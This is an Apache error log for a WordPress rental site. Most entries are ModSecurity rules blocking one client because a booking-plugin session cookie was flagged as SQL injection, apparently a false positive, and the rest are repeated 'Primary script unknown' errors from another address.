[Mon May 11 18:29:48.591346 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agID_DJnyuKVXoStDhbhUAAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:49.223468 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agID_DJnyuKVXoStDhbhUAAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:49.387735 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agID_TJnyuKVXoStDhbhUgAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:49.388023 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agID_TJnyuKVXoStDhbhUgAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:49.984138 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agID_TJnyuKVXoStDhbhUgAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:50.208138 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agID_jJnyuKVXoStDhbhVAAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:50.208439 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agID_jJnyuKVXoStDhbhVAAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:50.774082 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agID_jJnyuKVXoStDhbhVAAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:51.264125 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agID_zJnyuKVXoStDhbhVQAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:51.264448 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agID_zJnyuKVXoStDhbhVQAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:51.821858 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agID_zJnyuKVXoStDhbhVQAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:51.964609 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agID_zJnyuKVXoStDhbhVwAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:51.964884 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agID_zJnyuKVXoStDhbhVwAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:52.351881 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agID_zJnyuKVXoStDhbhVwAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:52.806363 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIEADJnyuKVXoStDhbhWAAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:52.806642 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIEADJnyuKVXoStDhbhWAAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:54.234609 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEADJnyuKVXoStDhbhWAAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:54.330251 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIEAjJnyuKVXoStDhbhYQAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:54.330532 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIEAjJnyuKVXoStDhbhYQAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:54.956782 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEAjJnyuKVXoStDhbhYQAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:55.364952 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIEAzJnyuKVXoStDhbhZQAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:55.365241 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIEAzJnyuKVXoStDhbhZQAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:55.942436 2026] [proxy_fcgi:error] [pid 1424905:tid 1424908] [client 40.69.66.178:4377] AH01071: Got error 'Primary script unknown'
[Mon May 11 18:29:55.968106 2026] [proxy_fcgi:error] [pid 1424905:tid 1424908] [client 40.69.66.178:4377] AH01071: Got error 'Primary script unknown'
[Mon May 11 18:29:55.969425 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEAzJnyuKVXoStDhbhZQAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:55.992409 2026] [proxy_fcgi:error] [pid 1424905:tid 1424908] [client 40.69.66.178:4377] AH01071: Got error 'Primary script unknown'
[Mon May 11 18:29:56.016143 2026] [proxy_fcgi:error] [pid 1424905:tid 1424908] [client 40.69.66.178:4377] AH01071: Got error 'Primary script unknown'
[Mon May 11 18:29:56.040102 2026] [proxy_fcgi:error] [pid 1424905:tid 1424908] [client 40.69.66.178:4377] AH01071: Got error 'Primary script unknown'
[Mon May 11 18:29:56.064339 2026] [proxy_fcgi:error] [pid 1424905:tid 1424908] [client 40.69.66.178:4377] AH01071: Got error 'Primary script unknown'
[Mon May 11 18:29:56.088350 2026] [proxy_fcgi:error] [pid 1424905:tid 1424908] [client 40.69.66.178:4377] AH01071: Got error 'Primary script unknown'
[Mon May 11 18:29:56.112144 2026] [proxy_fcgi:error] [pid 1424905:tid 1424908] [client 40.69.66.178:4377] AH01071: Got error 'Primary script unknown'
[Mon May 11 18:29:56.135994 2026] [proxy_fcgi:error] [pid 1424905:tid 1424908] [client 40.69.66.178:4377] AH01071: Got error 'Primary script unknown'
[Mon May 11 18:29:56.160176 2026] [proxy_fcgi:error] [pid 1424905:tid 1424908] [client 40.69.66.178:4377] AH01071: Got error 'Primary script unknown'
[Mon May 11 18:29:56.184045 2026] [proxy_fcgi:error] [pid 1424905:tid 1424908] [client 40.69.66.178:4377] AH01071: Got error 'Primary script unknown'
[Mon May 11 18:29:56.207967 2026] [proxy_fcgi:error] [pid 1424905:tid 1424908] [client 40.69.66.178:4377] AH01071: Got error 'Primary script unknown'
[Mon May 11 18:29:56.232495 2026] [proxy_fcgi:error] [pid 1424905:tid 1424908] [client 40.69.66.178:4377] AH01071: Got error 'Primary script unknown'
[Mon May 11 18:29:56.254526 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIEBDJnyuKVXoStDhbhZwAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:56.254790 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIEBDJnyuKVXoStDhbhZwAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:56.256348 2026] [proxy_fcgi:error] [pid 1424905:tid 1424908] [client 40.69.66.178:4377] AH01071: Got error 'Primary script unknown'
[Mon May 11 18:29:56.280378 2026] [proxy_fcgi:error] [pid 1424905:tid 1424908] [client 40.69.66.178:4377] AH01071: Got error 'Primary script unknown'
[Mon May 11 18:29:56.331507 2026] [proxy_fcgi:error] [pid 1424905:tid 1424908] [client 40.69.66.178:4377] AH01071: Got error 'Primary script unknown'
[Mon May 11 18:29:56.355789 2026] [proxy_fcgi:error] [pid 1424905:tid 1424908] [client 40.69.66.178:4377] AH01071: Got error 'Primary script unknown'
[Mon May 11 18:29:56.379893 2026] [proxy_fcgi:error] [pid 1424905:tid 1424908] [client 40.69.66.178:4377] AH01071: Got error 'Primary script unknown'
[Mon May 11 18:29:56.403706 2026] [proxy_fcgi:error] [pid 1424905:tid 1424908] [client 40.69.66.178:4377] AH01071: Got error 'Primary script unknown'
[Mon May 11 18:29:56.427468 2026] [proxy_fcgi:error] [pid 1424905:tid 1424908] [client 40.69.66.178:4377] AH01071: Got error 'Primary script unknown'
[Mon May 11 18:29:56.454365 2026] [proxy_fcgi:error] [pid 1424905:tid 1424908] [client 40.69.66.178:4377] AH01071: Got error 'Primary script unknown'
[Mon May 11 18:29:56.479712 2026] [proxy_fcgi:error] [pid 1424905:tid 1424908] [client 40.69.66.178:4377] AH01071: Got error 'Primary script unknown'
[Mon May 11 18:29:56.503596 2026] [proxy_fcgi:error] [pid 1424905:tid 1424908] [client 40.69.66.178:4377] AH01071: Got error 'Primary script unknown'
[Mon May 11 18:29:56.815561 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEBDJnyuKVXoStDhbhZwAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:56.957039 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIEBDJnyuKVXoStDhbhaAAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:56.957321 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIEBDJnyuKVXoStDhbhaAAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:57.518889 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEBDJnyuKVXoStDhbhaAAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:57.676264 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIEBTJnyuKVXoStDhbhagAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:57.676549 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIEBTJnyuKVXoStDhbhagAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:58.049177 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEBTJnyuKVXoStDhbhagAAAEE"], referer: https://rentparadise.fr/wp-login.php
